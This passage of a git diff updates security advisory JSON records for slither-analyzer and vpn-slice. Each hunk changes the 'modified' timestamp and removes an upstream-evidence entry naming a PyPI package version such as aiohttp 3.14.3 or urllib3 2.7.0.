"subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-26209.json b/advisories/BREW-slither-analyzer-CVE-2026-26209.json index 754f946087..a8e7e9ae08 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-26209.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-26209.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-26209", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-3c37-wwvx-h642", "CVE-2026-26209", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": "pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34513.json b/advisories/BREW-slither-analyzer-CVE-2026-34513.json index 5175f7ec33..d3dfc102e5 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34513.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34513", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34514.json b/advisories/BREW-slither-analyzer-CVE-2026-34514.json index 9fc779279b..c2643e3694 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34514.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34514", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34515.json b/advisories/BREW-slither-analyzer-CVE-2026-34515.json index e25f85cb1c..cd2d92c23c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34515.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34515", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34516.json b/advisories/BREW-slither-analyzer-CVE-2026-34516.json index 2dc24d1f52..813a2ebcfe 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34516.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34516", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34517.json b/advisories/BREW-slither-analyzer-CVE-2026-34517.json index 2015afabcd..777cab61b8 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34517.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34517", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34518.json b/advisories/BREW-slither-analyzer-CVE-2026-34518.json index e9fa69e694..0ef30912a0 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34518.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34518", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34519.json b/advisories/BREW-slither-analyzer-CVE-2026-34519.json index a7916668bf..f33ea6841d 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34519.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34519", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34520.json b/advisories/BREW-slither-analyzer-CVE-2026-34520.json index 8a4978b8a0..5e9e13f324 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34520.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34520", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34525.json b/advisories/BREW-slither-analyzer-CVE-2026-34525.json index 35d4920855..ecf82ae187 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34525.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34525", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34993.json b/advisories/BREW-slither-analyzer-CVE-2026-34993.json index bd0d3c3e41..c3da5e8964 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34993.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34993", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-40072.json b/advisories/BREW-slither-analyzer-CVE-2026-40072.json index 5e1bf9d981..563e571ccb 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-40072.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-40072.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-40072", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5hr4-253g-cpx2", "CVE-2026-40072", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "web3", - "subject_version": "7.16.0", - "key": "pkg:pypi/web3@7.16.0", - "resource": "web3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-44431.json b/advisories/BREW-slither-analyzer-CVE-2026-44431.json index 8fc412727f..27f9e92275 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-44431.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-44431", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-44432.json b/advisories/BREW-slither-analyzer-CVE-2026-44432.json index 59c335935e..3ca4c9d45f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-44432.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-44432", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-45409.json b/advisories/BREW-slither-analyzer-CVE-2026-45409.json index 6e24364f41..83239ed21d 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-45409.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-45409", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-47265.json b/advisories/BREW-slither-analyzer-CVE-2026-47265.json index 38cd7b4817..55ed337caa 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-47265.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-47265", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-50269.json b/advisories/BREW-slither-analyzer-CVE-2026-50269.json index f1880f3bff..35c95df173 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-50269.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-50269", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54273.json b/advisories/BREW-slither-analyzer-CVE-2026-54273.json index b0f73406a4..c5906f28f8 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54273.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54273", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54274.json b/advisories/BREW-slither-analyzer-CVE-2026-54274.json index fddd9d0685..abd0df7711 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54274.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54274", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54275.json b/advisories/BREW-slither-analyzer-CVE-2026-54275.json index 96d0eb10e6..cecfc4c3fc 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54275.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54275", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54276.json b/advisories/BREW-slither-analyzer-CVE-2026-54276.json index 5db55a7242..9da000fca1 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54276.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54276", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54277.json b/advisories/BREW-slither-analyzer-CVE-2026-54277.json index 25c066a4fe..16180b2889 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54277.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54277", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54278.json b/advisories/BREW-slither-analyzer-CVE-2026-54278.json index b74bbb404b..0a23281384 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54278.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54278", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54279.json b/advisories/BREW-slither-analyzer-CVE-2026-54279.json index 222210f9c8..291d4ff740 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54279.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54279", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54280.json b/advisories/BREW-slither-analyzer-CVE-2026-54280.json index ea97e59623..c3cb6e5c5f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54280.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54280", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-59881.json b/advisories/BREW-slither-analyzer-CVE-2026-59881.json index f4e629884e..acab729a15 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-59881.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-59881", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-69243.json b/advisories/BREW-slither-analyzer-CVE-2026-69243.json index 11bf883365..d662a10528 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-69243.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-69243", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-69244.json b/advisories/BREW-slither-analyzer-CVE-2026-69244.json index 68ee337ed7..b2ef3233db 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-69244.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-69244", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vpn-slice-CVE-2023-29483.json b/advisories/BREW-vpn-slice-CVE-2023-29483.json index c9a4f0585e..5e5a1faacb 100644 --- a/advisories/BREW-vpn-slice-CVE-2023-29483.json +++ b/advisories/BREW-vpn-slice-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vpn-slice-CVE-2023-29483", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI",